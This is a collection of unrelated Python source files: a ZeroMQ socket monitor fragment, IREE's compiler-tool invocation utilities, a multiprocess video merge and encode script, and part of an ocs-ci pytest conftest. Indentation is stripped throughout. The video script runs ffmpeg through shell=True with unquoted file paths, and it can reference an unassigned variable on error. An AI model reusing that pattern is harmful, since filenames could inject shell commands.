# We cannot log here because we'll get an interrupted system call in trying
# to flush the logging buffer as we terminate
pass
@property
def event_map(self):
if ZeroMQSocketMonitor.__EVENT_MAP is None:
event_map = {}
for name in dir(zmq):
if name.startswith("EVENT_"):
value = getattr(zmq, name)
event_map[value] = name
ZeroMQSocketMonitor.__EVENT_MAP = event_map
return ZeroMQSocketMonitor.__EVENT_MAP
def monitor_callback(self, msg):
evt = zmq.utils.monitor.parse_monitor_message(msg)
evt["description"] = self.event_map[evt["event"]]
log.debug("ZeroMQ event: %s", evt)
if evt["event"] == zmq.EVENT_MONITOR_STOPPED:
self.stop()
def stop(self):
if self._socket is None:
return
self._socket.disable_monitor()
self._socket = None
self._monitor_socket = None
if self._monitor_stream is not None:
self._monitor_stream.close()
self._monitor_stream = None
log.trace("Event monitor done!")
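# --- Illustrative sketch (added for exposition, not part of the original
# module). A minimal, hedged example of attaching ZeroMQSocketMonitor to a
# plain pyzmq socket and polling its events from a thread; it assumes
# zmq.utils.monitor is importable, and the endpoint is hypothetical (nothing
# needs to be listening for connect events to be emitted).
def _example_socket_monitor():
    context = zmq.Context()
    sock = context.socket(zmq.REQ)
    monitor = ZeroMQSocketMonitor(sock)
    threading.Thread(target=monitor.start_poll, daemon=True).start()
    sock.connect("tcp://127.0.0.1:5555")  # hypothetical endpoint
    # EVENT_CONNECT_DELAYED / EVENT_CONNECTED etc. are logged by
    # monitor_callback as they arrive; call monitor.stop() when done.
    return monitor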
|
binaries.py
|
# Lint-as: python3
"""Utilities for locating and invoking compiler tool binaries."""
# Copyright 2020 The IREE Authors
#
# Licensed under the Apache License v2.0 with LLVM Exceptions.
# See https://llvm.org/LICENSE.txt for license information.
# SPDX-License-Identifier: Apache-2.0 WITH LLVM-exception
import importlib
import io
import logging
import os
import platform
import shlex
import subprocess
import sys
import textwrap
import threading
from typing import List, Optional, Union
__all__ = [
"find_tool",
"invoke_immediate",
"invoke_pipeline",
"get_tool_path",
"CompilerToolError",
]
_BUILTIN_TOOLS = [
"ireec",
"iree-translate",
]
# In normal distribution circumstances, each named tool is associated with
# a python module that provides a `get_tool` function for getting its absolute
# path. This dictionary maps the tool name to the module.
_TOOL_MODULE_MAP = {
# Note that ireec is builtin, but if not found, it can be resolved
# in the external 'core' module. This is used for some outside packaging
# options.
"ireec": "iree.tools.core",
"iree-import-tflite": "iree.tools.tflite",
"iree-import-xla": "iree.tools.xla",
"iree-import-tf": "iree.tools.tf",
}
# Map of tool module to package name as distributed to archives (used for
# error messages).
_TOOL_MODULE_PACKAGES = {
"iree.tools.core": "<none>",
"iree.tools.tf": "iree-tools-tf",
"iree.tools.tflite": "iree-tools-tflite",
"iree.tools.xla": "iree-tools-xla",
}
# Environment variable holding directories to be searched for named tools.
# Delimited by os.pathsep.
_TOOL_PATH_ENVVAR = "IREE_TOOL_PATH"
# We do complicated logging so retain our own Logger instance.
logger = logging.getLogger(__name__)
class CompilerToolError(Exception):
"""Compiler exception that preserves the command line and error output."""
def __init__(self, process: subprocess.CompletedProcess):
try:
errs = process.stderr.decode("utf-8")
except Exception:
errs = str(process.stderr) # Decode error or other: best we can do.
tool_name = os.path.basename(process.args[0])
super().__init__(f"Error invoking IREE compiler tool {tool_name}\n"
f"Diagnostics:\n{errs}\n\n"
f"Invoked with:\n {tool_name} {' '.join(process.args)}")
def get_tool_path() -> List[str]:
"""Returns list of paths to search for tools."""
list_str = os.environ.get(_TOOL_PATH_ENVVAR)
if not list_str:
return []
return list_str.split(os.pathsep)
def find_tool(exe_name: str) -> str:
"""Finds a tool by its (extension-less) executable name.
Args:
exe_name: The name of the executable (extension-less).
Returns:
An absolute path to the tool.
Raises:
ValueError: If the tool is not known or not found.
"""
is_builtin = exe_name in _BUILTIN_TOOLS
if not is_builtin and exe_name not in _TOOL_MODULE_MAP:
raise ValueError(f"IREE compiler tool '{exe_name}' is not a known tool")
# First search an explicit tool path (from environment).
tool_path = get_tool_path()
for path_entry in tool_path:
if not path_entry:
continue
candidate_exe = os.path.join(path_entry, exe_name)
if _is_executable(candidate_exe):
return candidate_exe
if is_builtin:
# Get builtin tool.
candidate_exe = _get_builtin_tool(exe_name)
if _is_executable(candidate_exe):
return candidate_exe
# Fall-through and attempt to find it via a tools module.
# Attempt to load the tool module.
tool_module_name = _TOOL_MODULE_MAP[exe_name]
tool_module_package = _TOOL_MODULE_PACKAGES[tool_module_name]
try:
tool_module = importlib.import_module(tool_module_name)
except ModuleNotFoundError:
raise ValueError(
f"IREE compiler tool '{exe_name}' is not installed (it should have been "
f"found in the python module '{tool_module_name}', typically installed "
f"via the package {tool_module_package}).\n\n"
f"Either install the package or set the {_TOOL_PATH_ENVVAR} environment "
f"variable to contain the path of the tool executable "
f"(current {_TOOL_PATH_ENVVAR} = {repr(tool_path)}).") from None
# Ask the module for its tool.
candidate_exe = tool_module.get_tool(exe_name)
if (not _is_executable(candidate_exe)):
raise ValueError(
f"IREE compiler tool '{exe_name}' was located in module "
f"'{tool_module_name}' but the file was not found or not executable: "
f"{candidate_exe}")
return candidate_exe
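# Summary of the resolution order implemented by find_tool() above:
#   1. Directories listed in the IREE_TOOL_PATH environment variable
#      (os.pathsep separated).
#   2. For builtin tools, the binary bundled next to the _mlir_libs package.
#   3. The per-tool python module from _TOOL_MODULE_MAP, via its get_tool().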
def _get_builtin_tool(exe_name: str) -> Optional[str]:
# Transitional note: iree-translate is allowed and resolves to "ireec".
if exe_name == "iree-translate":
exe_name = "ireec"
if platform.system() == "Windows":
exe_name = exe_name + ".exe"
this_path = os.path.dirname(__file__)
tool_path = os.path.join(this_path, "..", "_mlir_libs", exe_name)
return tool_path
def _is_executable(candidate_exe: str) -> bool:
if not candidate_exe:
return False
if not os.path.isfile(candidate_exe):
return False
if not os.access(candidate_exe, os.X_OK):
return False
return True
def invoke_immediate(command_line: List[str],
*,
                     input_file: Optional[str] = None,
immediate_input=None):
"""Invokes an immediate command.
This is separate from invoke_pipeline as it is simpler and supports more
complex input redirection, using recommended facilities for sub-processes
(less magic).
Note that this differs from the usual way of using subprocess.run or
subprocess.Popen().communicate() because we need to pump all of the error
streams individually and only pump pipes not connected to a different stage.
Uses threads to pump everything that is required.
"""
if logger.isEnabledFor(logging.INFO):
logging.info("Invoke IREE Tool: %s", _quote_command_line(command_line))
run_args = {}
input_file_handle = None
stderr_handle = sys.stderr
try:
# Redirect input.
if input_file is not None:
input_file_handle = open(input_file, "rb")
run_args["stdin"] = input_file_handle
elif immediate_input is not None:
run_args["input"] = immediate_input
# Capture output.
# TODO(#4131) python>=3.7: Use capture_output=True.
run_args["stdout"] = subprocess.PIPE
run_args["stderr"] = subprocess.PIPE
process = subprocess.run(command_line, **run_args)
if process.returncode != 0:
raise CompilerToolError(process)
# Emit stderr contents.
_write_binary_stderr(stderr_handle, process.stderr)
return process.stdout
finally:
if input_file_handle:
input_file_handle.close()
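# Hedged usage sketch (not part of the original module): resolving a tool and
# invoking it immediately, capturing its stdout as bytes. The "--help"
# argument is illustrative only, not a documented flag.
def _example_invoke_ireec_help() -> bytes:
  ireec_path = find_tool("ireec")
  return invoke_immediate([ireec_path, "--help"])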
def invoke_pipeline(command_lines: List[List[str]], immediate_input=None):
"""Invoke a pipeline of commands.
The first stage of the pipeline will have its stdin set to DEVNULL and each
subsequent stdin will derive from the prior stdout. The final stdout will
be accumulated and returned. All stderr contents are accumulated and printed
to stderr on completion or the first failing stage of the pipeline will have
an exception raised with its stderr output.
"""
  logger.info(
"Invoke IREE Pipeline:\n %s",
"\n ".join([_quote_command_line(line) for line in command_lines]))
stages = []
pipeline_input = (subprocess.DEVNULL
if immediate_input is None else subprocess.PIPE)
prev_out = pipeline_input
stderr_handle = sys.stderr
# Create all stages.
for i in range(len(command_lines)):
command_line = command_lines[i]
popen_args = {
"stdin": prev_out,
"stdout": subprocess.PIPE,
"stderr": subprocess.PIPE,
}
process = subprocess.Popen(command_line, **popen_args)
prev_out = process.stdout
capture_output = (i == (len(command_lines) - 1))
stages.append(_PipelineStage(process, capture_output))
# Start stages.
for stage in stages:
stage.start()
# Pump input.
pipe_success = True
if immediate_input is not None:
try:
pipe_success = False
stages[0].process.stdin.write(immediate_input)
pipe_success = True
finally:
stages[0].process.stdin.close()
# Join.
for stage in stages:
stage.join()
# Check for errors.
for stage in stages:
assert stage.completed
if stage.completed.returncode != 0:
raise CompilerToolError(stage.completed)
# Broken pipe.
if not pipe_success:
raise CompilerToolError(stages[0].completed)
# Print any stderr output.
for stage in stages:
_write_binary_stderr(stderr_handle, stage.errs)
return stages[-1].outs
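# Hedged usage sketch (not part of the original module): a two-stage pipeline
# where an importer's stdout feeds the compiler's stdin. Tool names come from
# the maps above; the command-line arguments are placeholders rather than
# documented flags of either tool.
def _example_import_and_compile(saved_model_dir: str) -> bytes:
  importer = find_tool("iree-import-tf")
  compiler = find_tool("ireec")
  return invoke_pipeline([
      [importer, saved_model_dir],
      [compiler, "-"],
  ])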
class _PipelineStage(threading.Thread):
"""Wraps a process and pumps its handles, waiting for completion."""
def __init__(self, process, capture_output):
super().__init__()
self.process = process
self.capture_output = capture_output
self.completed: Optional[subprocess.CompletedProcess] = None
self.outs = None
self.errs = None
def pump_stderr(self):
self.errs = self.process.stderr.read()
def pump_stdout(self):
self.outs = self.process.stdout.read()
def run(self):
stderr_thread = threading.Thread(target=self.pump_stderr)
stderr_thread.start()
if self.capture_output:
stdout_thread = threading.Thread(target=self.pump_stdout)
stdout_thread.start()
self.process.wait()
stderr_thread.join()
if self.capture_output:
stdout_thread.join()
self.completed = subprocess.CompletedProcess(self.process.args,
self.process.returncode,
self.outs, self.errs)
self.process.stderr.close()
self.process.stdout.close()
def _write_binary_stderr(out_handle, contents):
# Fast-paths buffered text-io (which stderr is by default) while allowing
# full decode for non buffered and binary io.
if hasattr(out_handle, "buffer"):
out_handle.buffer.write(contents)
elif isinstance(out_handle, io.TextIOBase):
out_handle.write(contents.decode("utf-8"))
else:
out_handle.write(contents)
def _quote_command_line(command_line: List[str]) -> str:
return " ".join([shlex.quote(token) for token in command_line])
|
mitsuba.py
|
# -*- coding: utf-8 -*-
import ctypes
import os
import shutil
import cv2
import glob
import subprocess
import signal
from pydub import AudioSegment
from collections import defaultdict
from tqdm import tqdm
from multiprocessing import Process, Queue, Value, Pipe
from queue import Empty
from logging import getLogger, StreamHandler, Formatter, FileHandler, getLevelName
from config import *
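# Names this script expects config.py to provide (all referenced below):
#   LOG_LEVEL, IN_DIR, OUT_DIR, TMP_DIR, INPUT_FILE_COPY,
#   DUP_FRAME, DUP_AUDIO, VIDEO_FILTER, VIDEO_CODEC,
#   VIDEO_BR_1, VIDEO_BR_2, VIDEO_BR_3, MERGE_WORKERS, ENCODE_WORKERS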
def setup_logger(modname):
log_level = getLevelName(LOG_LEVEL)
logger = getLogger(modname)
logger.setLevel(log_level)
sh = StreamHandler()
sh.setLevel(log_level)
formatter = Formatter(
'%(asctime)s - %(name)s - %(levelname)s - %(message)s')
sh.setFormatter(formatter)
logger.addHandler(sh)
fh = FileHandler("error.log") # fh = file handler
fh.setLevel(log_level)
fh_formatter = Formatter(
'%(asctime)s - %(filename)s - %(name)s - %(lineno)d - %(levelname)s - %(message)s')
fh.setFormatter(fh_formatter)
logger.addHandler(fh)
return logger
logger = setup_logger(__name__)
def merge_video(movie_files, key_name, send_end):
tmp_video_file = os.path.join(TMP_DIR, f"tmp_v_{key_name}.mp4")
debug_1 = ""
try:
        # Output format: mp4
fourcc = cv2.VideoWriter_fourcc('m', 'p', '4', 'v')
        # Get the source video properties
movie = cv2.VideoCapture(movie_files[0])
fps = movie.get(cv2.CAP_PROP_FPS)
height = movie.get(cv2.CAP_PROP_FRAME_HEIGHT)
width = movie.get(cv2.CAP_PROP_FRAME_WIDTH)
# 出力先のファイルを開く
out = cv2.VideoWriter(tmp_video_file, int(fourcc), fps,
(int(width), int(height)))
for i, movies in enumerate(movie_files):
debug_1 = movies
            # Open the video file; the argument is the path to the video
movie = cv2.VideoCapture(movies)
count = movie.get(cv2.CAP_PROP_FRAME_COUNT)
frames = []
            if not movie.isOpened():  # Skip files that could not be opened
continue
for _ in range(int(count)):
                ret, tmp_f = movie.read()  # read() grabs one frame of image data
if ret:
frames.append(tmp_f)
            # Write out the frames that were read
if i == 0:
[out.write(f) for f in frames]
else:
[out.write(f) for f in frames[DUP_FRAME:]]
    except Exception as e:
        logger.error(e)
        logger.error(debug_1)
    finally:
        if out is not None:
            out.release()
    send_end.send((tmp_video_file, height))
def merge_audio(movie_files, key_name, send_end):
tmp_audio_file_sub = os.path.join(TMP_DIR, f"tmp_a_{key_name}_sub.wav")
tmp_audio_file = os.path.join(TMP_DIR, f"tmp_a_{key_name}.wav")
audio_merged = AudioSegment.empty()
for i, movies in enumerate(movie_files):
command = f"ffmpeg -y -i {movies} -vn -loglevel quiet {tmp_audio_file_sub}"
subprocess.run(command, shell=True)
audio_tmp = AudioSegment.from_file(tmp_audio_file_sub, format="wav")
if i == 0:
audio_merged += audio_tmp
else:
audio_merged += audio_tmp[DUP_AUDIO:]
    # Export the merged audio
audio_merged.export(tmp_audio_file, format="wav")
os.remove(tmp_audio_file_sub)
send_end.send(tmp_audio_file)
def encode_movie(key_name, video_file, height, audio_file):
filename = os.path.join(TMP_DIR, f"{key_name}.mp4")
    # Combine the video and audio streams
vf = VIDEO_FILTER
cv = f"-c:v {VIDEO_CODEC}"
    # The bitrate is fixed per resolution tier.
if height == 1080: # FHD
bv = f"-b:v {VIDEO_BR_1}"
elif height == 720: # HD
bv = f"-b:v {VIDEO_BR_2}"
else: # VGA
bv = f"-b:v {VIDEO_BR_3}"
loglevel = "-loglevel quiet"
command = f"ffmpeg -y -i {video_file} -i {audio_file} {cv} {bv} {vf} -c:a aac {loglevel} {filename}"
subprocess.run(command, shell=True)
os.remove(video_file)
os.remove(audio_file)
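# For reference, with height == 1080 the command built above expands to
# (angle-bracketed values come from config.py):
#   ffmpeg -y -i <video_file> -i <audio_file> -c:v <VIDEO_CODEC> \
#       -b:v <VIDEO_BR_1> <VIDEO_FILTER> -c:a aac -loglevel quiet <key_name>.mp4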
def transfer(tran_q, merge_q, end_sw):
    # Copy the inputs to local storage first, e.g. when they live on a network share
while not end_sw.value:
try:
files_list, key_name, _ = tran_q.get(timeout=30)
files_list_t = []
for f in files_list:
if INPUT_FILE_COPY:
copy_to_path = os.path.join(TMP_DIR, f.split("/")[-1])
if not os.path.exists(copy_to_path):
shutil.copy(f, copy_to_path)
files_list_t.append(copy_to_path)
else:
files_list_t.append(f)
            merge_q.put((files_list_t, key_name))
except Empty:
continue
def merger(merge_q, encode_q, end_sw):
while not end_sw.value:
try:
files_list, key_name = merge_q.get(timeout=30)
recv_end_v, send_end_v = Pipe(False)
recv_end_a, send_end_a = Pipe(False)
proc_v = Process(target=merge_video, args=(
files_list, key_name, send_end_v))
proc_a = Process(target=merge_audio, args=(
files_list, key_name, send_end_a))
proc_v.start()
proc_a.start()
proc_v.join()
proc_a.join()
if INPUT_FILE_COPY:
for f in files_list:
os.remove(f)
tmp_video_file, height = recv_end_v.recv()
tmp_audio_file = recv_end_a.recv()
encode_q.put((key_name, tmp_video_file, height, tmp_audio_file))
except Empty:
continue
def encoder(encode_q, tran2_q, end_sw):
while not end_sw.value:
try:
key_name, tmp_video_file, height, tmp_audio_file = encode_q.get(timeout=30)
encode_movie(key_name, tmp_video_file, height, tmp_audio_file)
tran2_q.put(key_name)
except Empty:
continue
def transfer2(tran2_q, tqdm_q, end_sw):
while not end_sw.value:
try:
key_name = tran2_q.get(timeout=30)
copy_from_path = os.path.join(TMP_DIR, f"{key_name}.mp4")
copy_to_path = os.path.join(OUT_DIR, f"{key_name}.mp4")
try:
shutil.copy(copy_from_path, copy_to_path)
os.remove(copy_from_path)
except Exception as e:
logger.error(e)
continue
tqdm_q.put(key_name)
except Empty:
continue
def progress(tqdm_q, size, pcnt, end_sw):
with tqdm(total=size) as t:
while size > pcnt.value:
key_name = tqdm_q.get()
t.set_description(f"{key_name} finished")
t.update(1)
pcnt.value += 1
end_sw.value = True
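# Data flow between the worker processes wired up below:
#   tran_q -> transfer() -> merge_q -> merger() -> encode_q -> encoder()
#          -> tran2_q -> transfer2() -> tqdm_q -> progress()
# progress() sets end_sw once every group is done, which lets the timed-out
# queue reads in the loops above exit cleanly.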
if __name__ == '__main__':
os.makedirs(TMP_DIR, exist_ok=True)
os.makedirs(OUT_DIR, exist_ok=True)
tran_q = Queue()
merge_q = Queue(maxsize=MERGE_WORKERS*4)
encode_q = Queue(maxsize=ENCODE_WORKERS*4)
tran2_q = Queue()
tqdm_q = Queue()
pcnt = Value(ctypes.c_int)
pcnt.value = 0
end_sw = Value(ctypes.c_bool)
end_sw.value = False
    # Group the videos in the directory by camera (front/rear) and by recording start time
files_dict = defaultdict(list)
for f in glob.glob(os.path.join(IN_DIR, "*.MP4")):
files_dict["_".join(f.split("/")[-1].split("_")[:2])].append(f)
data = []
for i, (key_name, files_list) in enumerate(files_dict.items()):
if not os.path.exists(os.path.join(OUT_DIR, f"{key_name}.mp4")):
data.append((sorted(files_list), key_name, i))
[tran_q.put(q) for q in data]
proc_tran = Process(target=transfer, args=(tran_q, merge_q, end_sw))
proc_tran.start()
proc_merg = [Process(target=merger, args=(merge_q, encode_q, end_sw))
for _ in range(MERGE_WORKERS)]
[p.start() for p in proc_merg]
proc_enc = [Process(target=encoder, args=(encode_q, tran2_q, end_sw))
for _ in range(ENCODE_WORKERS)]
[p.start() for p in proc_enc]
proc_tran2 = Process(target=transfer2, args=(tran2_q, tqdm_q, end_sw))
proc_tran2.start()
proc_tqdm = Process(target=progress, args=(tqdm_q, len(data), pcnt, end_sw))
proc_tqdm.start()
proc_tran.join()
[p.join() for p in proc_merg]
[p.join() for p in proc_enc]
proc_tqdm.join()
proc_tran2.join()
shutil.rmtree(TMP_DIR)
|
conftest.py
|
import logging
import os
import random
import time
import tempfile
import threading
from concurrent.futures.thread import ThreadPoolExecutor
from datetime import datetime
from math import floor
from shutil import copyfile
from functools import partial
from botocore.exceptions import ClientError
import pytest
from collections import namedtuple
from ocs_ci.deployment import factory as dep_factory
from ocs_ci.framework import config
from ocs_ci.framework.pytest_customization.marks import (
deployment,
ignore_leftovers,
tier_marks,
ignore_leftover_label,
)
from ocs_ci.ocs import constants, defaults, fio_artefacts, node, ocp, platform_nodes
from ocs_ci.ocs.bucket_utils import craft_s3_command
from ocs_ci.ocs.exceptions import (
CommandFailed,
TimeoutExpiredError,
CephHealthException,
ResourceWrongStatusException,
UnsupportedPlatformError,
PoolDidNotReachReadyState,
StorageclassNotCreated,
PoolNotDeletedFromUI,
StorageClassNotDeletedFromUI,
)
from ocs_ci.ocs.mcg_workload import mcg_job_factory as mcg_job_factory_implementation
from ocs_ci.ocs.node import get_node_objs, schedule_nodes
from ocs_ci.ocs.ocp import OCP
from ocs_ci.ocs.resources import pvc
from ocs_ci.ocs.utils import setup_ceph_toolbox, collect_ocs_logs
from ocs_ci.ocs.resources.backingstore import (
backingstore_factory as backingstore_factory_implementation,
)
from ocs_ci.ocs.resources.namespacestore import (
namespace_store_factory as namespacestore_factory_implementation,
)
from ocs_ci.ocs.resources.bucketclass import (
bucket_class_factory as bucketclass_factory_implementation,
)
from ocs_ci.ocs.resources.cloud_manager import CloudManager
from ocs_ci.ocs.resources.cloud_uls import (
cloud_uls_factory as cloud_uls_factory_implementation,
)
from ocs_ci.ocs.node import check_nodes_specs
from ocs_ci.ocs.resources.mcg import MCG
from ocs_ci.ocs.resources.objectbucket import BUCKET_MAP
from ocs_ci.ocs.resources.ocs import OCS
from ocs_ci.ocs.resources.pod import (
get_rgw_pods,
delete_deploymentconfig_pods,
get_pods_having_label,
get_deployments_having_label,
Pod,
)
from ocs_ci.ocs.resources.pvc import PVC, create_restore_pvc
from ocs_ci.ocs.version import get_ocs_version, report_ocs_version
from ocs_ci.ocs.cluster_load import ClusterLoad, wrap_msg
from ocs_ci.utility import (
aws,
deployment_openshift_logging as ocp_logging_obj,
ibmcloud,
kms as KMS,
reporting,
templating,
users,
)
from ocs_ci.utility.environment_check import (
get_status_before_execution,
get_status_after_execution,
)
from ocs_ci.utility.flexy import load_cluster_info
from ocs_ci.utility.kms import is_kms_enabled
from ocs_ci.utility.prometheus import PrometheusAPI
from ocs_ci.utility.uninstall_openshift_logging import uninstall_cluster_logging
from ocs_ci.utility.utils import (
ceph_health_check,
ceph_health_check_base,
get_running_ocp_version,
get_openshift_client,
get_system_architecture,
get_testrun_name,
load_auth_config,
ocsci_log_path,
skipif_ocp_version,
skipif_ocs_version,
TimeoutSampler,
skipif_upgraded_from,
update_container_with_mirrored_image,
skipif_ui_not_support,
)
from ocs_ci.helpers import helpers
from ocs_ci.helpers.helpers import (
create_unique_resource_name,
create_ocs_object_from_kind_and_name,
setup_pod_directories,
get_current_test_name,
)
from ocs_ci.ocs.bucket_utils import get_rgw_restart_counts
from ocs_ci.ocs.pgsql import Postgresql
from ocs_ci.ocs.resources.rgw import RGW
from ocs_ci.ocs.jenkins import Jenkins
from ocs_ci.ocs.amq import AMQ
from ocs_ci.ocs.elasticsearch import ElasticSearch
from ocs_ci.ocs.ui.base_ui import login_ui, close_browser
from ocs_ci.ocs.ripsaw import RipSaw
from ocs_ci.ocs.ui.block_pool import BlockPoolUI
from ocs_ci.ocs.ui.storageclass import StorageClassUI
from ocs_ci.ocs.couchbase_new import CouchBase
log = logging.getLogger(__name__)
class OCSLogFormatter(logging.Formatter):
def __init__(self):
fmt = (
"%(asctime)s - %(threadName)s - %(levelname)s - %(name)s.%(funcName)s.%(lineno)d "
"- %(message)s"
)
super(OCSLogFormatter, self).__init__(fmt)
def pytest_logger_config(logger_config):
logger_config.add_loggers([""], stdout_level="info")
logger_config.set_log_option_default("")
logger_config.split_by_outcome()
logger_config.set_formatter_class(OCSLogFormatter)
def pytest_collection_modifyitems(session, items):
"""
A pytest hook to filter out skipped tests satisfying
skipif_ocs_version, skipif_upgraded_from or skipif_no_kms
Args:
        session: pytest session
        items: list of collected tests
"""
teardown = config.RUN["cli_params"].get("teardown")
deploy = config.RUN["cli_params"].get("deploy")
skip_ocs_deployment = config.ENV_DATA["skip_ocs_deployment"]
# Add squad markers to each test item based on filepath
for item in items:
# check, if test already have squad marker manually assigned
if any(map(lambda x: "_squad" in x.name, item.iter_markers())):
continue
for squad, paths in constants.SQUADS.items():
for _path in paths:
# Limit the test_path to the tests directory
test_path = os.path.relpath(item.fspath.strpath, constants.TOP_DIR)
if _path in test_path:
item.add_marker(f"{squad.lower()}_squad")
item.user_properties.append(("squad", squad))
break
if not (teardown or deploy or skip_ocs_deployment):
for item in items[:]:
skipif_ocp_version_marker = item.get_closest_marker("skipif_ocp_version")
skipif_ocs_version_marker = item.get_closest_marker("skipif_ocs_version")
skipif_upgraded_from_marker = item.get_closest_marker(
"skipif_upgraded_from"
)
skipif_no_kms_marker = item.get_closest_marker("skipif_no_kms")
skipif_ui_not_support_marker = item.get_closest_marker(
"skipif_ui_not_support"
)
if skipif_ocp_version_marker:
skip_condition = skipif_ocp_version_marker.args
# skip_condition will be a tuple
# and condition will be first element in the tuple
if skipif_ocp_version(skip_condition[0]):
log.info(
f"Test: {item} will be skipped due to OCP {skip_condition}"
)
items.remove(item)
continue
if skipif_ocs_version_marker:
skip_condition = skipif_ocs_version_marker.args
# skip_condition will be a tuple
# and condition will be first element in the tuple
if skipif_ocs_version(skip_condition[0]):
log.info(f"Test: {item} will be skipped due to {skip_condition}")
items.remove(item)
continue
if skipif_upgraded_from_marker:
skip_args = skipif_upgraded_from_marker.args
if skipif_upgraded_from(skip_args[0]):
log.info(
f"Test: {item} will be skipped because the OCS cluster is"
f" upgraded from one of these versions: {skip_args[0]}"
)
items.remove(item)
if skipif_no_kms_marker:
try:
if not is_kms_enabled():
log.info(
f"Test: {item} it will be skipped because the OCS cluster"
f" has not configured cluster-wide encryption with KMS"
)
items.remove(item)
except KeyError:
log.warning(
"Cluster is not yet installed. Skipping skipif_no_kms check."
)
if skipif_ui_not_support_marker:
skip_condition = skipif_ui_not_support_marker
if skipif_ui_not_support(skip_condition.args[0]):
log.info(
f"Test: {item} will be skipped due to UI test {skip_condition.args} is not available"
)
items.remove(item)
continue
# skip UI test on openshift dedicated ODF-MS platform
if (
config.ENV_DATA["platform"].lower() == constants.OPENSHIFT_DEDICATED_PLATFORM
or config.ENV_DATA["platform"].lower() == constants.ROSA_PLATFORM
):
for item in items.copy():
if "/ui/" in str(item.fspath):
log.info(
f"Test {item} is removed from the collected items"
f" UI is not supported on {config.ENV_DATA['platform'].lower()}"
)
items.remove(item)
@pytest.fixture()
def supported_configuration():
"""
Check that cluster nodes have enough CPU and Memory as described in:
https://access.redhat.com/documentation/en-us/red_hat_openshift_container_storage/4.2/html-single/planning_your_deployment/index#infrastructure-requirements_rhocs
This fixture is intended as a prerequisite for tests or fixtures that
    are flaky on configurations that don't meet minimal requirements.
Minimum requirements for each starting node (OSD+MON):
16 CPUs
64 GB memory
Last documentation check: 2020-02-21
"""
min_cpu = constants.MIN_NODE_CPU
min_memory = constants.MIN_NODE_MEMORY
log.info("Checking if system meets minimal requirements")
if not check_nodes_specs(min_memory=min_memory, min_cpu=min_cpu):
err_msg = (
f"At least one of the worker nodes doesn't meet the "
f"required minimum specs of {min_cpu} vCPUs and {min_memory} RAM"
)
pytest.xfail(err_msg)
@pytest.fixture(scope="session", autouse=True)
def auto_load_auth_config():
try:
auth_config = {"AUTH": load_auth_config()}
config.update(auth_config)
except FileNotFoundError:
pass # If auth file doesn't exist we just ignore.
@pytest.fixture(scope="class")
def secret_factory_class(request):
return secret_factory_fixture(request)
@pytest.fixture(scope="session")
def secret_factory_session(request):
return secret_factory_fixture(request)
@pytest.fixture(scope="function")
def secret_factory(request):
return secret_factory_fixture(request)
def secret_factory_fixture(request):
"""
Secret factory. Calling this fixture creates a new secret.
RBD based is default.
** This method should not be used anymore **
** This method is for internal testing only **
"""
instances = []
def factory(interface=constants.CEPHBLOCKPOOL):
"""
Args:
interface (str): CephBlockPool or CephFileSystem. This decides
whether a RBD based or CephFS resource is created.
RBD is default.
"""
secret_obj = helpers.create_secret(interface_type=interface)
assert secret_obj, "Failed to create a secret"
instances.append(secret_obj)
return secret_obj
def finalizer():
"""
Delete the RBD secrets
"""
for instance in instances:
instance.delete()
instance.ocp.wait_for_delete(instance.name)
request.addfinalizer(finalizer)
return factory
@pytest.fixture(scope="session", autouse=True)
def log_ocs_version(cluster):
"""
Fixture handling version reporting for OCS.
This fixture handles alignment of the version reporting, so that we:
* report version for each test run (no matter if just deployment, just
test or both deployment and tests are executed)
* prevent conflict of version reporting with deployment/teardown (eg. we
should not run the version logging before actual deployment, or after
a teardown)
Version is reported in:
* log entries of INFO log level during test setup phase
* ocs_version file in cluster path directory (for copy pasting into bug
reports)
"""
teardown = config.RUN["cli_params"].get("teardown")
deploy = config.RUN["cli_params"].get("deploy")
dev_mode = config.RUN["cli_params"].get("dev_mode")
skip_ocs_deployment = config.ENV_DATA["skip_ocs_deployment"]
if teardown and not deploy:
log.info("Skipping version reporting for teardown.")
return
elif dev_mode:
log.info("Skipping version reporting for development mode.")
return
elif skip_ocs_deployment:
log.info("Skipping version reporting since OCS deployment is skipped.")
return
cluster_version, image_dict = get_ocs_version()
file_name = os.path.join(
config.ENV_DATA["cluster_path"], "ocs_version." + datetime.now().isoformat()
)
with open(file_name, "w") as file_obj:
report_ocs_version(cluster_version, image_dict, file_obj)
log.info("human readable ocs version info written into %s", file_name)
@pytest.fixture(scope="class")
def ceph_pool_factory_class(request, replica=3, compression=None):
return ceph_pool_factory_fixture(request, replica=replica, compression=compression)
@pytest.fixture(scope="session")
def ceph_pool_factory_session(request, replica=3, compression=None):
return ceph_pool_factory_fixture(request, replica=replica, compression=compression)
@pytest.fixture(scope="function")
def ceph_pool_factory(request, replica=3, compression=None):
return ceph_pool_factory_fixture(request, replica=replica, compression=compression)
def ceph_pool_factory_fixture(request, replica=3, compression=None):
"""
Create a Ceph pool factory.
Calling this fixture creates new Ceph pool instance.
** This method should not be used anymore **
** This method is for internal testing only **
"""
instances = []
def factory(
interface=constants.CEPHBLOCKPOOL, replica=replica, compression=compression
):
if interface == constants.CEPHBLOCKPOOL:
ceph_pool_obj = helpers.create_ceph_block_pool(
replica=replica, compression=compression
)
elif interface == constants.CEPHFILESYSTEM:
cfs = ocp.OCP(
kind=constants.CEPHFILESYSTEM, namespace=defaults.ROOK_CLUSTER_NAMESPACE
).get(defaults.CEPHFILESYSTEM_NAME)
ceph_pool_obj = OCS(**cfs)
assert ceph_pool_obj, f"Failed to create {interface} pool"
if interface != constants.CEPHFILESYSTEM:
instances.append(ceph_pool_obj)
return ceph_pool_obj
def finalizer():
"""
Delete the Ceph block pool
"""
for instance in instances:
instance.delete()
instance.ocp.wait_for_delete(instance.name)
request.addfinalizer(finalizer)
return factory
@pytest.fixture(scope="class")
def storageclass_factory_class(request, ceph_pool_factory_class, secret_factory_class):
return storageclass_factory_fixture(
request, ceph_pool_factory_class, secret_factory_class
)
@pytest.fixture(scope="session")
def storageclass_factory_session(
request, ceph_pool_factory_session, secret_factory_session
):
return storageclass_factory_fixture(
request, ceph_pool_factory_session, secret_factory_session
)
@pytest.fixture(scope="function")
def storageclass_factory(request, ceph_pool_factory, secret_factory):
return storageclass_factory_fixture(request, ceph_pool_factory, secret_factory)
def storageclass_factory_fixture(
request,
ceph_pool_factory,
secret_factory,
):
"""
Create a storage class factory. Default is RBD based.
Calling this fixture creates new storage class instance.
** This method should not be used anymore **
** This method is for internal testing only **
"""
instances = []
def factory(
interface=constants.CEPHBLOCKPOOL,
secret=None,
custom_data=None,
sc_name=None,
reclaim_policy=constants.RECLAIM_POLICY_DELETE,
replica=3,
